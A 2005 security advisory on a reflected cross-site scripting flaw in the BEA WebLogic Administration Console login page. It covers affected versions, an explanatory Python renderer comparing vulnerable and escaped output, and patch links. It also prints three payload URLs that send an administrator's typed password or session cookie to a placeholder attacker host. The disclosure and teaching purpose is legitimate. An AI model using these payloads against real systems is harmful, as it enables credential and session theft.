Application Security, Inc.

Team SHATTER Security Alert

BEA WebLogic Administration Console login page cross-site scripting vulnerability

May 27, 2005

Risk Level: High

Affected versions:
BEA WebLogic Server 7.0 and 8.1

Credits:
This vulnerability was discovered and researched by Agustín Martínez Fayó of Argeniss for Application Security Inc.

Background:
The Administration Console is a web browser-based, graphical user interface used to manage a WebLogic Server domain. The Administration Console supports a full range of product administrative tasks. A cross-site scripting vulnerability exists in the login page of the Console.

Details:
Cross-site scripting vulnerabilities occur when a web application copies attacker-controlled input into a page it serves without encoding it for the context in which it lands, so the browser interprets the input as markup or script rather than as data. In the reflected form seen here, the attack is a crafted hyperlink with the script embedded in a request parameter. A valid user is likely to click it, since it points to a resource on a trusted domain; the link can be posted on a web page or sent by instant message or e-mail. When the page loads, the injected code runs in the browser with the origin of the trusted application, so it can read the document (including values typed into form fields) and the site's cookies. Typically the code steals the session cookie, which can then be replayed to impersonate the valid user.

The "j_username" and "j_password" parameters of the Administration Console login page (LoginForm.jsp) are vulnerable to cross-site scripting. The values supplied in these parameters are reflected into the page without output encoding, so an attacker who controls them can break out of the surrounding HTML and inject arbitrary script.

Below are some examples of the hyperlinks an attacker could use. In each one the parameter value closes the input field's value attribute and adds an onBlur handler, which fires when the administrator tabs or clicks away from that field; "%2B" is the URL-encoded form of "+", so the string concatenation survives query-string decoding (a literal "+" would decode to a space). "vulnerablesite" and "hackersite" are placeholders for the console host and the attacker's collection server.

Steal the administrator's password (the handler runs after the password has been typed into the field):
http://vulnerablesite:7001/console/login/LoginForm.jsp?j_password=""onBlur="window.open('http://hackersite/'%2Bdocument.all.j_password.value)"

Get the session cookie:
http://vulnerablesite:7001/console/login/LoginForm.jsp?j_username=""onBlur="window.open('http://hackersite/'%2Bdocument.cookie)"
or
http://vulnerablesite:7001/console/login/LoginForm.jsp?j_password=""onBlur="window.open('http://hackersite/'%2Bdocument.cookie)"
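The following is an added example, not code from this advisory or from BEA. It models the login form as a small Python renderer so the attribute break-out described above can be seen and tested offline. The vulnerable template is an assumption (BEA's real LoginForm.jsp source is not reproduced on this page): it writes the parameter into an unquoted value= attribute, which is the context in which the advisory's ""onBlur=... payload closes the value and starts a new attribute. The hardened variant quotes the attribute and HTML-escapes the value first. Python's html.parser then plays the browser's part and reports which inputs ended up with an event-handler attribute.

```python
"""Reflected XSS in an HTML attribute context: vulnerable vs. hardened rendering.

Added example for this advisory; not BEA's LoginForm.jsp. ASSUMPTION: the
vulnerable template interpolates the request parameter into an unquoted
value= attribute, so the advisory's ""onBlur=... payload terminates the
value and introduces a new attribute.
"""
import html
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlsplit

# The advisory's example hyperlinks (vulnerablesite / hackersite are placeholders).
PASSWORD_LINK = (
    "http://vulnerablesite:7001/console/login/LoginForm.jsp"
    "?j_password=\"\"onBlur=\"window.open('http://hackersite/'%2Bdocument.all.j_password.value)\""
)
COOKIE_LINK = (
    "http://vulnerablesite:7001/console/login/LoginForm.jsp"
    "?j_username=\"\"onBlur=\"window.open('http://hackersite/'%2Bdocument.cookie)\""
)
FIELDS = ("j_username", "j_password")


def login_params(url):
    """Extract j_username / j_password as a servlet container hands them to the
    JSP: percent-decoded, so the advisory's %2B arrives as a literal '+'
    (a raw '+' in the query string would have decoded to a space)."""
    qs = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return {f: qs.get(f, [""])[0] for f in FIELDS}


def render_login_form(params, hardened):
    """Render the two login inputs.
    hardened=False: hypothetical vulnerable template, value=<%= param %> unquoted.
    hardened=True : attribute is quoted and the value HTML-escaped (& < > " ')
                    so the whole parameter stays inside value="..."."""
    def attr(value):
        if hardened:
            return '"' + html.escape(value, quote=True) + '"'
        return value  # assumed vulnerable behaviour: raw, unquoted interpolation
    return (
        '<form method="POST" action="j_security_check">\n'
        f'<input type="text" name="j_username" value={attr(params["j_username"])}>\n'
        f'<input type="password" name="j_password" value={attr(params["j_password"])}>\n'
        '</form>\n'
    )


class _InputAttrs(HTMLParser):
    """Collect the attributes of each <input>, keyed by its name attribute."""

    def __init__(self):
        super().__init__()
        self.inputs = {}

    def handle_starttag(self, tag, attrs):
        if tag == "input":
            d = dict(attrs)
            self.inputs[d.get("name")] = d


def parsed_inputs(markup):
    """Parse the rendered form the way a browser tokenizer splits attributes."""
    p = _InputAttrs()
    p.feed(markup)
    p.close()
    return p.inputs


def injected_handlers(markup):
    """Map each input name to the event-handler attributes (on*) found on it.
    A non-empty list means the parameter escaped the value attribute and the
    attacker now controls script bound to that field."""
    return {name: sorted(k for k in attrs if k.startswith("on"))
            for name, attrs in parsed_inputs(markup).items()}


if __name__ == "__main__":
    for link in (PASSWORD_LINK, COOKIE_LINK):
        params = login_params(link)
        print("vulnerable:", injected_handlers(render_login_form(params, hardened=False)))
        print("hardened:  ", injected_handlers(render_login_form(params, hardened=True)))
```

With the vulnerable template the password field comes back with an empty value and an extra onblur attribute carrying the attacker's script; with the hardened template the parser sees a single value attribute whose decoded content is the untouched payload, which is exactly what the user typed and nothing more. Quoting alone is not enough (a payload starting with a double quote would still break out), and escaping alone is not enough in an unquoted attribute (a space would start a new attribute); both are needed. In JSP the equivalent of the hardened branch is emitting the value through an escaping tag such as JSTL's fn:escapeXml inside a quoted attribute rather than a raw scriptlet expression.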

Impact:
Attackers can steal an administrator's session cookie or password, and use either to impersonate that user against the Administration Console.

Workaround:
There is no workaround for this issue.

Vendor Status:
Vendor was contacted and a patch was released.

Fix:
For BEA WebLogic Server and WebLogic Express 8.1, upgrade to Service Pack 4, then apply the patch located at ftp://ftpna.bea.com/pub/releases/security/CR202495_810sp4.jar on top of it.

For BEA WebLogic Server and WebLogic Express 7.0, upgrade to Service Pack 6, then apply the patch located at ftp://ftpna.bea.com/pub/releases/security/CR214457_700sp6.jar on top of it.

Links:
BEA Advisory: http://dev2dev.bea.com/pub/advisory/130